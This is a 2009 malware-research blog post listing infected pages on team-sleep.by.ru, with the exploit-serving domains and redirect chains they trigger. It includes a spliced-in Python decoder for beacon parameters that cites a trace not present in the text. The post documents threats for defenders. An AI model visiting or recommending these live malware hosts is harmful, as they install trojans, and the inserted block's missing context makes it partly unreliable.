Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-32446320936023593342009-04-20T02:05:00.000-07:002009-04-20T16:07:51.240-07:00Black Hat SEO - RBN Hacks, p.4<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="502" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="502" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO, exploits, hacks, botnets</span><br /><br /> Crimeware toolkits in the wild<br /></p><table width="488" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="488"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p><b>WARNING</b>: All sites listed on this page are dangerous (live URLs with exploits) <br /> which lead to trojans being automatically installed on your computer.<br />Do NOT visit them unless you know what you are doing. <br />(only the links are safe)<br /></p><p>Another very good example is the site below, which leads to other domains in the previously cited "Eurohost LLC" network and shows that this attack seems to be everywhere.<br /><br />Injected IFrames, PDF malware and viruses. 
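The statsanalist.cn beacon in the "HTTP activity after infection" trace above sends its gd, affid, subid and prov values as base64, while the trafficstatic.net requests in the same trace expose the affiliate and sub ids in clear text (/banner/crcmds/affids/11, /banner/crcmds/subids/v3072). The Python below is an added example, not code from this blog: it assumes each value is a single-byte XOR of the plaintext followed by base64 (an assumption made here, not stated in the post), recovers the key from that known-plaintext pair rather than guessing it, and decodes the remaining fields, which is what turns such a beacon into a usable detection signature and affiliate attribution instead of an opaque URL.

```python
"""Decode the obfuscated statsanalist.cn beacon parameters (added example).

Assumption made here: every encoded field is plaintext XOR one key byte, then
base64. The key is recovered from affid/subid, whose plaintext is visible in the
clear-text trafficstatic.net paths of the same post-infection trace.
"""
import base64
from urllib.parse import urlsplit

# Beacon request lines copied from the post (host omitted, the query is what matters).
BEACONS = [
    "/?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5",
    "/?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5",
]
# Known plaintext: /banner/crcmds/affids/11 and /banner/crcmds/subids/v3072.
KNOWN_PLAINTEXT = {"affid": b"11", "subid": b"v3072"}
# Fields that are obfuscated; mode= and v= are sent in clear text.
ENCODED_PARAMS = ("gd", "affid", "subid", "prov")


def split_query(url: str) -> dict:
    """Split the query string without URL-decoding, so a base64 '+' survives
    (urllib's parse_qs would turn it into a space)."""
    out = {}
    for pair in urlsplit(url).query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            out[name] = value
    return out


def recover_xor_key(b64_value: str, plaintext: bytes):
    """Return the single key byte k with decoded[i] ^ k == plaintext[i] for all i,
    or None when the value is not a one-byte XOR of that plaintext."""
    try:
        raw = base64.b64decode(b64_value, validate=True)
    except ValueError:          # binascii.Error is a ValueError subclass
        return None
    if not raw or len(raw) != len(plaintext):
        return None
    candidates = {c ^ p for c, p in zip(raw, plaintext)}
    return candidates.pop() if len(candidates) == 1 else None


def recover_key_from_beacon(url: str):
    """Derive the key from every known-plaintext field and require agreement."""
    params = split_query(url)
    keys = {recover_xor_key(params.get(name, ""), plaintext)
            for name, plaintext in KNOWN_PLAINTEXT.items()}
    return keys.pop() if len(keys) == 1 and None not in keys else None


def decode_value(b64_value: str, key: int) -> str:
    raw = base64.b64decode(b64_value)
    return bytes(c ^ key for c in raw).decode("ascii", errors="replace")


def decode_beacon(url: str, key: int) -> dict:
    """Decode the obfuscated fields of one beacon; clear-text fields pass through."""
    return {name: decode_value(value, key) if name in ENCODED_PARAMS else value
            for name, value in split_query(url).items()}


def decode_all(beacons=BEACONS):
    """Recover the key from the first beacon, then decode every beacon with it."""
    key = recover_key_from_beacon(beacons[0])
    if key is None:
        raise ValueError("affid/subid are not a single-byte XOR of the known plaintext")
    return key, [decode_beacon(b, key) for b in beacons]


if __name__ == "__main__":
    key, decoded = decode_all()
    print(f"recovered key: 0x{key:02x}")
    for fields in decoded:
        print(fields)
```

The decoded gd values name the beacon type (parameter fetch, then install confirmation), which is the field a proxy or IDS rule should key on together with mode=cr, since affid and subid vary per affiliate.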
Attached some screenshots.<br /><br /><hr />Infected page:<br /><br /><table width="400" height="28" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="26" style="padding:10px">hxxp://team-sleep.by.ru/default2.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=604bd9c2390b9bad17a7d36a01a31421&t=1240189015&type=js" target="_blank">Analysis</a><br /></p><table width="400" height="28" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="26" style="padding:10px">hxxp://8addition.info/t/?75724cae9d <br />hxxp://sexbases.cn/in.cgi?16&161b72<br />hxxp://utevox.site90.com/f/index.php</td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqwAwjXtE_G3ij_j9s0egWm9xJdRYYUgKMLVxb-DDfH1L-mjc4CEJvkk6wMRIHhiM3Cnc8D9Xwmmt3jT13djRQAMuiPTP9yyt0gswErkNTNSJAEBOhkqhBjA7kT3fXRSO-OKwFpIUnkmTP/s1600-h/default2.html.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 167px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqwAwjXtE_G3ij_j9s0egWm9xJdRYYUgKMLVxb-DDfH1L-mjc4CEJvkk6wMRIHhiM3Cnc8D9Xwmmt3jT13djRQAMuiPTP9yyt0gswErkNTNSJAEBOhkqhBjA7kT3fXRSO-OKwFpIUnkmTP/s320/default2.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697404935945826" /></a></p><p>************<br />Infected page: <br /></p><table width="400" height="28" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="26" style="padding:10px">hxxp://team-sleep.by.ru/demo.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=15d95656782ca0e0a1318bba5b3d5db0&t=1240189151&type=js" target="_blank">Analysis</a><br /></p><p> Requests: <br /></p><table width="400" height="28" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="26" style="padding:10px">hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://bizoplata.ru/post.html<br 
/>hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://famajormusic.ru/jjkj/pdf.php</td></tr></table><p> Redirects: <br /></p><table width="400" height="94" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="92" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDbmHLiGgvuNS9iDf3apxlAkRDY_c4dcDe8SnfO4sVfmTrGAQzGfkcxC4xB-3PnQxsYzbxtIJ7hkSFJqvAqTnE-_EnnQocCwfVBpsX_SHpTjeBRks9OJcWF5x9ShPgok2PRPzfNFZexm6E/s1600-h/demo.html.jpg"><img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDbmHLiGgvuNS9iDf3apxlAkRDY_c4dcDe8SnfO4sVfmTrGAQzGfkcxC4xB-3PnQxsYzbxtIJ7hkSFJqvAqTnE-_EnnQocCwfVBpsX_SHpTjeBRks9OJcWF5x9ShPgok2PRPzfNFZexm6E/s320/demo.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697406846514322" /></a></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/gold.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=c0ca85dbda05d075a7c97ab22a8630db&t=1240189158&type=js" target="_blank">Analysis</a><br /><br />Requests:<br /></p><table width="400" height="94" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="92" style="padding:10px">hxxp://team-sleep.by.ru/gold.html<br /> hxxp://5rublei.com/unique/index.php<br /> hxxp://tochtonenado.com/yes/index.php <br /> hxxp://mixbunch.cn/thread.html<br /> hxxp://mixbunch.cn/golf.html<br /> hxxp://tixwagoq.cn/in.cgi?4<br /> 
hxxp://paylayos.cn/nuc/index.php<br /> hxxp://mixbunch.cn/bowling.html<br /> hxxp://sunmaiamibich.ru/pupu/in.php<br /> hxxp://famajormusic.ru/jjkj/pdf.php</td></tr></table><p> Redirects: <br /></p><table width="400" height="94" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="92" style="padding:10px">hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /><br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQhMoU-JCSbPH9YU5hLPsIk7JgNlpj9KEwbSEM2q7WP4Rdaj1_5MBFOBYfTyCD97cXq-2dW00W3CDRlyEVz7LbUpTauqi40RXst6cXUSsuWfJ_O1W3yBW6-4NNO_O-ofgTEl7zDc-1vr1y/s1600-h/gold.html.jpg"><img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQhMoU-JCSbPH9YU5hLPsIk7JgNlpj9KEwbSEM2q7WP4Rdaj1_5MBFOBYfTyCD97cXq-2dW00W3CDRlyEVz7LbUpTauqi40RXst6cXUSsuWfJ_O1W3yBW6-4NNO_O-ofgTEl7zDc-1vr1y/s320/gold.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697411712294674" /></a><br /></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/googleanalyticsru.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=e453f768a057c80b81f2e547bbbf8242&t=1240189161&type=js" target="_blank">Analysis</a><br /><br /> Requests:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/googleanalyticsru.html<br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://sunmaiamibich.ru/</td></tr></table><p> Redirects: </p><table width="400" height="38" 
border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyNfmYt63Pec77LuNZcBynu89niu2N8DwnKWGRKbQ2aShFw-RlnDXA0ewn6PTp0qRB44uBHGhL1Oax5OLDmQI5SQMbXs-AZTXVBTTPQvndL6f4iBDhU8JbJTX14MN-KUZdC-LjkJztImKX/s1600-h/googleanalyticsru.html.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 218px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyNfmYt63Pec77LuNZcBynu89niu2N8DwnKWGRKbQ2aShFw-RlnDXA0ewn6PTp0qRB44uBHGhL1Oax5OLDmQI5SQMbXs-AZTXVBTTPQvndL6f4iBDhU8JbJTX14MN-KUZdC-LjkJztImKX/s320/googleanalyticsru.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697410248832818" /></a></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/media.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=829cb08a1a36b11a84fc82f50448f8e5&t=1240189172&type=js" target="_blank">Analysis</a><br /><br />Requests:</p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/media.html<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php</td></tr></table><p> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /><br />hxxp://tixwagoq.cn/in.cgi?4<br 
/>hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1l_gUEQbMkFbUSAri4HsLMnXsW65s5wC-mxPSyYCbaXGQqJ0zun6P2faOO93GGS6QtyzbqqVfSXqGFuEWdyzCrtUc2XwtPhvegy0HNUuZESk6Bp9WvR0foataU1wB1HhKQS1APsjiUeM_/s1600-h/media.html.jpg"><img style="cursor:pointer; cursor:hand;width: 314px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1l_gUEQbMkFbUSAri4HsLMnXsW65s5wC-mxPSyYCbaXGQqJ0zun6P2faOO93GGS6QtyzbqqVfSXqGFuEWdyzCrtUc2XwtPhvegy0HNUuZESk6Bp9WvR0foataU1wB1HhKQS1APsjiUeM_/s320/media.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697413596172466" /></a><br /></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/menu.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=7ac93ca405a6fc78e1e19062eee91e52&t=1240190210&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/menu.html<br />hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://bizoplata.ru/post.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br />hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://mixbunch.cn/bowling.html</td></tr></table><p> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php 
</td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOWbQ56j_kWHJXbvnKiOCYsbudYU03xpIn3MleiPjqNIp0maSqL-43K9LkTnV-b5nxXVDgnPrEBmEx1n5HDJXK59ImbalyRKLuaqR96irutgIMcqb58q5BMeCubpVt3QArAj2-zt8tQURZ/s1600-h/menu.html.jpg"><img style="cursor:pointer; cursor:hand;width: 239px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOWbQ56j_kWHJXbvnKiOCYsbudYU03xpIn3MleiPjqNIp0maSqL-43K9LkTnV-b5nxXVDgnPrEBmEx1n5HDJXK59ImbalyRKLuaqR96irutgIMcqb58q5BMeCubpVt3QArAj2-zt8tQURZ/s320/menu.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697773772393394" /></a><br /></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/news.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=a370e072f26ab0fc502ef5f090100f2d&t=1240189203&type=js" target="_blank">Analysis</a><br /></p>Requests: <br /><br /><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px"> hxxp://moneypuller.site90.net/images/gallery/index.php<br /> hxxp://error.000webhost.com/not_found.html<br /> hxxp://www.000webhost.com/?id=1<br /> hxxp://www.000webhost.com/<br /> hxxp://mixbunch.cn/thread.html<br /> hxxp://mixbunch.cn/golf.html<br /> hxxp://tixwagoq.cn/in.cgi?4<br /> hxxp://paylayos.cn/nuc/index.php<br /> hxxp://mixbunch.cn/bowling.html<br /> hxxp://sunmaiamibich.ru/pupu/in.php<br /> hxxp://famajormusic.ru/jjkj/pdf.php</td></tr></table><p>Redirects: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8-rkR4r9zXgfo5eVFvuyCyBb85nJznPv2vCWaVomxaM7PJSIt-_mpVCCD28TdYocFsaKEIT_5WvTSxealzcQXFqy2E8wMmRaKYwpR_Uuvh_osqmcZMU_kMr3IAtXdi0dXvzCXEo4U6c_B/s1600-h/news.html.jpg"><img style="cursor:pointer; cursor:hand;width: 290px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8-rkR4r9zXgfo5eVFvuyCyBb85nJznPv2vCWaVomxaM7PJSIt-_mpVCCD28TdYocFsaKEIT_5WvTSxealzcQXFqy2E8wMmRaKYwpR_Uuvh_osqmcZMU_kMr3IAtXdi0dXvzCXEo4U6c_B/s320/news.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697773721819954" /></a></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/photo2.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=b0240b35b771b8d402b49bf3e7827572&t=1240189200&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://bizoplata.ru/post.html<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php</td></tr></table><p><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-jORh1ERUDK0bJhJjUZVaG_AOOX8K2FYMf0f4NQLmj4gYcKfoL8sFVtmInruL7RGd5z1-aSG2FPTkEJDazBokZYk1sGbMoMzmUNxaEWqGA9MnxSQ224SAkshgi1_k9l53iK_0yJijxJH5/s1600-h/photo2.html.jpg"><img style="cursor:pointer; cursor:hand;width: 244px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg-jORh1ERUDK0bJhJjUZVaG_AOOX8K2FYMf0f4NQLmj4gYcKfoL8sFVtmInruL7RGd5z1-aSG2FPTkEJDazBokZYk1sGbMoMzmUNxaEWqGA9MnxSQ224SAkshgi1_k9l53iK_0yJijxJH5/s320/photo2.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697777139072290" /></a><br /></p><p>************<br />Infected page: </p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px"> hxxp://team-sleep.by.ru/poem.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=195a5226ceb60d0db3a38b2a8da4e763&t=1240189221&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://bizoplata.ru/pay.html?<br />hxxp://bizoplata.ru/ballast.html<br />hxxp://bizoplata.ru/post.html</td></tr></table><p> Redirects:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmIA5PvpaXIWlVUsB7YtJQ7j45cEc7K0QEv0Jaxsf70WsNuktFGYB9WKGLWcy0gAArucCVH2QixN7ecnlWSRFCIBQWtOuCcA39CcEPZ2rdv1T0fy9InOe65flNkwaGHu_zLdD1nd8caRzg/s1600-h/peom.html.jpg"><img 
style="cursor:pointer; cursor:hand;width: 320px; height: 286px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmIA5PvpaXIWlVUsB7YtJQ7j45cEc7K0QEv0Jaxsf70WsNuktFGYB9WKGLWcy0gAArucCVH2QixN7ecnlWSRFCIBQWtOuCcA39CcEPZ2rdv1T0fy9InOe65flNkwaGHu_zLdD1nd8caRzg/s320/peom.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326697779850021298" /></a></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/press_reviews.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=13731fd005d76fdaf4594868bf38fd66&t=1240189277&type=js" target="_blank">Analysis</a><br /><br /> Requests: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p> Redirects: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhofSdsC5GSfOAKwRnqX1zQ3VGCbHom7k28iQOq1HtlWAHruAYXWIRBK-qoXfpvg2yJkFw8jtZcLXKpwIKCts0XWMajqZ5f-yfT88f2eiceI2x5DCmeokPnrNV2LCLCZl8Q111F4FPMXKDR/s1600-h/press_review.html.jpg"><img style="cursor:pointer; cursor:hand;width: 318px; height: 320px;" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhofSdsC5GSfOAKwRnqX1zQ3VGCbHom7k28iQOq1HtlWAHruAYXWIRBK-qoXfpvg2yJkFw8jtZcLXKpwIKCts0XWMajqZ5f-yfT88f2eiceI2x5DCmeokPnrNV2LCLCZl8Q111F4FPMXKDR/s320/press_review.html.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5326697785555240354" /></a><br /></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/team-sleep.html</td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=279207d4fff5b20adcd1fb624b3740ab&t=1240189275&type=js" target="_blank">Analysis</a><br /><br /> Requests:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://mixbunch.cn/thread.html<br />hxxp://mixbunch.cn/golf.html<br />hxxp://tixwagoq.cn/in.cgi?4<br />hxxp://paylayos.cn/nuc/index.php<br />hxxp://mixbunch.cn/bowling.html<br />hxxp://sunmaiamibich.ru/pupu/in.php<br />hxxp://famajormusic.ru/jjkj/pdf.php<br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php </td></tr></table><p>Redirects:<br /></p><table width="400" height="94" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="92" style="padding:10px">hxxp://tixwagoq.cn/in.cgi?4 <br />hxxp://paylayos.cn/nuc/index.php <br /><br />hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs3takqQP9WLwcRFfTLx1vPCH5a5fbXOhdgFsTqRCURt3kuLceemqi_i6m-pV5lowNnN7v3cwnL29EUEHtUjlLgCqxjU_P4Tcjrj-uE6zU4dKxEb5qxmJIqG1oEFVbuVedrM7mgvwyi-wX/s1600-h/team-sleep.html.jpg"><img style="cursor:pointer; cursor:hand;width: 313px; height: 320px;" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjs3takqQP9WLwcRFfTLx1vPCH5a5fbXOhdgFsTqRCURt3kuLceemqi_i6m-pV5lowNnN7v3cwnL29EUEHtUjlLgCqxjU_P4Tcjrj-uE6zU4dKxEb5qxmJIqG1oEFVbuVedrM7mgvwyi-wX/s320/team-sleep.html.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326698010412514386" /></a><br /></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://team-sleep.by.ru/gmail.php<br /></td></tr></table><p><a href="http://wepawet.iseclab.org/view.php?hash=9fc1f920da916d7b64e66c3eec43d1cf&t=1240189268&type=js" target="_blank">Analysis</a><br /><br />Requests:<br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://counnter.cn/top100_00.js <br />hxxp://counnter.cn/z/count.php?o=1 <br />hxxp://5rublei.com/unique/index.php<br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p> Redirects: <br /></p><table width="400" height="38" border="1" cellpadding="0" cellspacing="0"><tr><td width="362" height="36" style="padding:10px">hxxp://5rublei.com/unique/index.php <br />hxxp://tochtonenado.com/yes/index.php <br /></td></tr></table><p><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2rd-k-E39yiTCsAvp30fKL5mo74NOShKscLxA1oSxd-UMplXN1uvjqqWz2aDXNdjwp01-hBUSVbtL_rJuuE3l17R20YoyAGusc8zzVuJkVXS4P16JpjhaZFNGkrvEmon-fvDPe2z9j7hi/s1600-h/gmail.php.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 260px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2rd-k-E39yiTCsAvp30fKL5mo74NOShKscLxA1oSxd-UMplXN1uvjqqWz2aDXNdjwp01-hBUSVbtL_rJuuE3l17R20YoyAGusc8zzVuJkVXS4P16JpjhaZFNGkrvEmon-fvDPe2z9j7hi/s320/gmail.php.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5326698006637059474" /></a><br /></p><p>************<br />Infected page: <br /></p><table width="400" height="38" border="1" cellpadding="0" 
